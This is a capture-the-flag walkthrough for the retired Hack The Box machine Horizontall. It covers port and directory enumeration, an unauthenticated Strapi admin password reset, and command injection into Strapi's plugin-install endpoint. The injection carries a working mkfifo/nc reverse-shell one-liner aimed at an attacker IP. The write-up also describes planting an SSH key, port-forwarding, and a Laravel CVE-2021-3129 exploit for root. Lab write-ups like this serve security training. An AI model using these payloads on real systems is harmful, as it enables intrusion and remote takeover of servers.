
Horizontall: Hack The Box Walkthrough

source link: https://hackso.me/horizontall-htb-walkthrough/

This post documents the complete walkthrough of Horizontall, a retired vulnerable VM created by wail99, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.


Background

Horizontall is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.11.105 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-30 04:26:35 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.11.105
Discovered open port 22/tcp on 10.10.11.105

Nothing unusual. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p22,80 -A --reason 10.10.11.105 -oN nmap.txt
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb

I’d better map horizontall.htb to 10.10.11.105 in /etc/hosts. This is what the site looks like.

I’m guessing HT refers to Horizontall.

Directory/File Enumeration

Let’s see what we can glean from gobuster and SecLists for a start.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -e -t 20 -x php,htm,html,txt -u http://horizontall.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://horizontall.htb/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,php,htm
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/08/30 06:24:57 Starting gobuster in directory enumeration mode
===============================================================
http://horizontall.htb/js                   (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]
http://horizontall.htb/css                  (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
http://horizontall.htb/img                  (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
http://horizontall.htb/index.html           (Status: 200) [Size: 901]

===============================================================
2021/08/30 06:26:09 Finished
===============================================================

This is a shit-show. We need more information.

Burp Suite - Site Map

Suppose we reload the site through Burp Suite.

What do we have here? I’d better include api-prod.horizontall.htb into the mix as well. A simple curl reveals more.

I wonder what’s Strapi…

Strapi Framework Vulnerable to Remote Code Execution

In any case, let’s run ffuf on api-prod.horizontall.htb and see what we get.

ffuf -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://api-prod.horizontall.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

Admin                   [Status: 200, Size: 854, Words: 98, Lines: 17]
ADMIN                   [Status: 200, Size: 854, Words: 98, Lines: 17]
admin                   [Status: 200, Size: 854, Words: 98, Lines: 17]
favicon.ico             [Status: 200, Size: 1150, Words: 4, Lines: 1]
index.html              [Status: 200, Size: 413, Words: 76, Lines: 20]
robots.txt              [Status: 200, Size: 121, Words: 19, Lines: 4]
reviews                 [Status: 200, Size: 507, Words: 21, Lines: 1]
users                   [Status: 403, Size: 60, Words: 1, Lines: 1]

I had Burp Suite on the entire time and when I saw the following response when I browsed to http://api-prod.horizontall.htb/admin, I knew I struck gold.

A quick Google search on “strapi rce” led me to this article. In short, Strapi 3.0.0-beta.17.7 or earlier is vulnerable to authenticated RCE and we have a 3.0.0-beta.17.4 on our hands.

Strapi Password Reset

Now, how can we get our hands on a password for remote code execution? Well, we don’t. There’s another vulnerability that allows us to reset a Strapi Administrator password without a reset token. Armed with this insight, all we need to reset the password is a POST request like so.

What’s really important is the JWT.

Foothold

Now that we have a valid JWT, getting foothold is easy.

curl -i \
     -s \
     -k \
     -X $'POST' \
     -H $'Authorization: Bearer [jwt]' \
     -H $'Content-Type: application/json' \
     -H $'Connection: close' \
     --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.17.134 1234 >/tmp/f)\",\"port\":\"1337\"}' \
     $'http://api-prod.horizontall.htb/admin/plugins/install'

The file user.txt is in developer’s home directory.

Privilege Escalation

During enumeration of the strapi account, I noticed port 8000/tcp listening on localhost.

I can easily inject an SSH key I control into /opt/strapi/.ssh/authorized_keys to 1) get a more stable shell, and 2) perform local port forwarding like so.

ssh -L 8000:127.0.0.1:8000 -i strapi [email protected]

Laravel

So, Laravel is running at 8000/tcp.

CVE-2021-3129 - Unauthenticated RCE in Ignition before 2.5.2 used in Laravel

We are looking at CVE-2021-3129. There are plenty of exploits for CVE-2021-3129 on GitHub, and I’ve chosen the one that appears to be the most straightforward.

I have shell over at my attacking terminal, a root shell no less.

Armed with a root shell, it’s trivial to retrieve root.txt.

:dancer:
